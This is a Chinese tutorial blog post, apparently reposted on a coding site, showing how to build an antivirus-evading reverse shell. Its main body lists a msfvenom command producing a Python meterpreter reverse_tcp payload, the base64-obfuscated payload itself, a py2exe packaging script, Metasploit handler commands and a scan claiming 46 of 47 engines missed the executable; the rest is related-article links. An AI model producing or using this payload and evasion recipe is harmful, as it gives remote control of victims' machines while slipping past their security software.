编程 Python

使用Python进行防病毒免杀解析

Posted in Python onDecember 13, 2019

很多渗透工具都提供了权限维持的能力，如Metasploit、Empire和Cobalt Strike，但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候，似乎越来越多的人关注的是，这个方式会不会被被杀软杀掉？

打造免杀的payload成了一个很重要的话题，在这里，本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

Python 2.7.16 x86：https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位：https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

使用Python进行防病毒免杀解析

evil.py 代码如下：

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows，同时创建一个setup.py文件：

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

下面的方法运行 evil.py，生成可执行文件。

python ./setup.py py2exe

使用Python进行防病毒免杀解析

0x03 设置监听端口

Kali 运行Metasploit，设置监听：

msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run

在Windows中运行evil.exe，获得一个meterpreter的会话

使用Python进行防病毒免杀解析

0x04 免杀验证

确认生成的exe文件可正常工作，接下来对evil.exe进行在线病毒扫描，以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎

使用Python进行防病毒免杀解析

扫描结果：47款杀毒引擎中，只有一个引擎报毒，主流的杀毒软件全部绕过。

网站地址: http://www.virscan.org

参考文章：

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

总结

以上所述是小编给大家介绍的使用Python进行防病毒免杀，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持！
如果你觉得本文对你有帮助，欢迎转载，烦请注明出处，谢谢！

使用Python进行防病毒免杀解析

- Author -

Bypass

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Python 相关文章推荐

详解Python中的__new__、__init__、__call__三个特殊方法

Jun 02 Python

Python快速从注释生成文档的方法

Dec 26 Python

Python编程之gui程序实现简单文件浏览器代码

Dec 08 Python

python导出hive数据表的schema实例代码

Jan 22 Python

pycharm的console输入实现换行的方法

Jan 16 Python

Python3 max()函数基础用法

Feb 19 Python

如何使用python操作vmware

Jul 27 Python

python 利用已有Ner模型进行数据清洗合并代码

Dec 24 Python

Jupyter Notebook输出矢量图实例

Apr 14 Python

keras 多任务多loss实例

Jun 22 Python

简单了解Python字典copy与赋值的区别

Sep 16 Python

Python暴力破解Mysql数据的示例

Nov 09 Python

python 使用shutil复制图片的例子

Dec 13 #Python

基于python traceback实现异常的获取与处理

Dec 13 #Python

python 实现批量替换文本中的某部分内容

Dec 13 #Python

django多种支付、并发订单处理实例代码

Dec 13 #Python

Python+OpenCV+图片旋转并用原底色填充新四角的例子

Dec 12 #Python

Python+OpenCV 实现图片无损旋转90°且无黑边

Dec 12 #Python

使用python去除图片白色像素的实例

Dec 12 #Python

You might like

分页显示Oracle数据库记录的类之一

2006/10/09 PHP

PHP数组实例详解

2016/06/26 PHP

php字符集转换

2017/01/23 PHP

PHP中Cookie的使用详解(简单易懂)

2017/04/28 PHP

PHP利用Socket获取网站的SSL证书与公钥

2017/06/18 PHP

tp5框架使用composer实现日志记录功能示例

2019/01/10 PHP

php自定义排序uasort函数示例【二维数组按指定键值排序】

2019/06/19 PHP

JAVASCRIPT style 中visibility和display之间的区别

2010/01/22 Javascript

js取整数、取余数的方法

2014/05/11 Javascript

jquery JSON的解析方式示例介绍

2014/07/27 Javascript

JavaScript匿名函数用法分析

2015/02/13 Javascript

以WordPress为例讲解jQuery美化页面Title的方法

2016/05/23 Javascript

jQuery实现的模拟弹出窗口功能示例

2016/11/24 Javascript

JavaScript实现替换字符串中最后一个字符的方法

2017/03/07 Javascript

JavaScript中offsetWidth的bug及解决方法

2017/05/17 Javascript

js 毫秒转天时分秒的实例

2017/11/17 Javascript

JavaScript捕捉事件和阻止冒泡事件实例分析

2018/08/03 Javascript

运用js实现图层拖拽的功能

2019/05/24 Javascript

vue实现记事本功能

2019/06/26 Javascript

解决Layui当中的导航条动态添加后渲染失败的问题

2019/09/25 Javascript

详解Golang 与python中的字符串反转

2017/07/21 Python

python利用socketserver实现并发套接字功能

2018/01/26 Python

python spyder中读取txt为图片的方法

2018/04/27 Python

10 行 Python 代码教你自动发送短信(不想回复工作邮件妙招)

2018/10/11 Python

Python学习笔记之读取文件、OS模块、异常处理、with as语法示例

2019/06/04 Python

利用python实现汉字转拼音的2种方法

2019/08/12 Python

python单例模式原理与创建方法实例分析

2019/10/26 Python

python连接mongodb集群方法详解

2020/02/13 Python

jupyter notebook读取/导出文件/图片实例

2020/04/16 Python

python实现ping命令小程序

2020/12/28 Python

中国综合网上购物商城：苏宁易购

2016/08/09 全球购物

adidas菲律宾官网：adidas PH

2020/02/07 全球购物

导游词范文之颐和园/重庆/云台山

2019/09/10 职场文书

Ajax异步刷新功能及简单案例

2021/11/20 Javascript

Mybatis-plus配置分页插件返回统一结果集

2022/06/21 Java/Android

前端canvas中物体边框和控制点的实现示例

2022/08/05 Javascript